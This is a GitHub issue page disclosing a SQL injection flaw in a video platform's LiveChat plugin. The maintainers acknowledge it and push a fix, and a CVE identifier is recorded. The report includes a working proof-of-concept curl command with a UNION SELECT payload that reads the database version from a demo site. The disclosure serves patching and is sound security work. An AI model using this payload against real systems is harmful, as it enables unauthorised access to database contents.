Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SQL Injection in LiveChat plugin

Closed
EgidioRomano opened this issue Oct 31, 2019 · 3 comments
Closed

SQL Injection in LiveChat plugin #2202

EgidioRomano opened this issue Oct 31, 2019 · 3 comments

Comments

@EgidioRomano
Copy link

EgidioRomano commented Oct 31, 2019

User input passed through the "live_stream_code" POST parameter to /plugin/LiveChat/getChat.json.php is not properly sanitized before being used to construct a SQL query. This can be exploited by malicious users to e.g. read sensitive data from the database through in-band SQL Injection attacks. Successful exploitation of this vulnerability requires the "Live Chat" plugin to be enabled.

Proof of Concept:

curl -X POST -d "live_stream_code=' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,VERSION(),31,32,33,34,35,36#" https://demo.youphptube.com/plugin/LiveChat/getChat.json.php
@DanielnetoDotCom
Copy link
Member

DanielnetoDotCom commented Oct 31, 2019

Thanks for noticing it, Security is the priority to us.

I fix was already sent.

@EgidioRomano
Copy link
Author

EgidioRomano commented Nov 2, 2019

CVE-2019-18662 has been assigned to this vulnerability.

@DanielnetoDotCom
Copy link
Member

DanielnetoDotCom commented Nov 2, 2019

Hi, can you help me? what is CVE-2019-18662?

DanielnetoDotCom pushed a commit that referenced this issue Nov 2, 2019
DanielnetoDotCom pushed a commit that referenced this issue Nov 2, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants